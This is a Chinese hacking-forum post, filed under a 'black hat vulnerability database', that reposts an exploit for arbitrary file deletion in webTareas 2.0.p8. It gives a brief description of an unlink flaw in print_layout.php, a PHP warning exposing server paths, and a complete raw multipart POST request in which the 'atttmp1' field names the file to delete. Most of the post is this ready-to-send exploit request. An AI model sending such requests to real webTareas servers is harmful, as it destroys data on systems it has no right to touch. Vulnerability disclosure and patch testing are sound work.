跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

webTareas 2.0.p8 - Arbitrary File Deletion

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
# Exploit Title: webTareas 2.0.p8 - Arbitrary File Deletion
# Date: 2020-05-02
# Author: Besim ALTINOK
# Vendor Homepage: https://sourceforge.net/projects/webtareas/files/
# Software Link: https://sourceforge.net/projects/webtareas/files/
# Version: v2.0.p8
# Tested on: Xampp
# Credit: İsmail BOZKURT


Description:
--------------------------------------------------------------------------------------

- print_layout.php is vulnerable. When you sent PoC code to the server and
If there is no file on the server, you can see, this error message

<br />
<b>Warning</b>:
 unlink(/Applications/XAMPP/xamppfiles/htdocs/webtareas/files/PrintLayouts/tester.png.php--1.zip):
No such file or directory in
<b>/Applications/XAMPP/xamppfiles/htdocs/webtareas/includes/library.php</b>
on line <b>1303</b><br />

- So, Here, you can delete file with unlink function.
- And, I ddi try again with another file, I deleted from the server.
--------------------------------------------------------------------------------------------

Arbitrary File Deletion PoC
---------------------------------------------------------------------------------------

POST
/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&id=1&mode=edit&borne1=0
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 ***********************
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&mode=edit&borne1=0&id=1
Content-Type: multipart/form-data;
boundary=---------------------------3678767312987982041084647942
Content-Length: 882
DNT: 1
Connection: close
Cookie: webTareasSID=4b6a4799c9e7906a06c574dc48ffb730;
PHPSESSIDwebERPteam=9b2b068ea2de93ed1ee0aafe27818191
Upgrade-Insecure-Requests: 1

-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="action"

edit
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="desc"

<p>tester</p>
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="file1"; filename=""
Content-Type: application/octet-stream


-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="attnam1"


-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="atttmp1"

--add the delete file name here--
-----------------------------3678767312987982041084647942
Content-Disposition: form-data; name="sp"


-----------------------------3678767312987982041084647942--

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。